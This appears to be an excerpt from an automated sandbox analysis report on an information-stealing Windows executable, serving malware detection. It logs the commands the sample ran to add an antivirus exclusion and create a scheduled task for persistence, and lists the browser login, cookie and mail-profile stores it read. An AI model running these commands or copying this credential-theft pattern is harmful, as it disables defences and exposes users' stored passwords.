                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Users\user\Desktop\7495 P.exe "C:\Users\user\Desktop\7495 P.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Users\user\Desktop\7495 P.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Design\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Design.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Users\user\Desktop\7495 P.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Design\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Design.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\7495 P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HRrXXnBIpL.exe PID: 9096, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\7495 P.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
